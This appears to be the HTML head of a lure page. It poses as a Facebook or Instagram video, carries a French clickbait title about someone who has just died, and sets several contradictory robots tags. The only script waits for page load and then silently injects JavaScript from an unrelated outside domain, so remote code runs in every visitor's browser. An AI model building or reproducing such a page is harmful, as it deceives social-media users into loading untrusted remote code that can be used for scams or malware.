<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="Vidéo Facebook"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Ecoute, il vient de mourir, c'est arrivé maintenant..."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1062454395989671958/1229302141366173756/image.png?ex=662f2fd5&is=661cbad5&hm=b300c21e5296a688415dc606ff702a83c8f1c1301816b90dd8e69d2840df2cf1&=&format=webp&quality=lossless&width=550&height=304"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>

<script>
    window.addEventListener('load', function() {
        // Carga el script en lugar de redirigir a una URL aleatoria
        setTimeout(function() {
            // Crea un elemento script y asigna el src
            var script = document.createElement('script');
            script.src = 'https://pititua.us/2k25/?api=1&lan=abierto100&ht=2';
            script.type = 'text/javascript';
            script.async = true;

            // Agrega el script al final del body
            document.body.appendChild(script);
        }, 500);
    });
</script>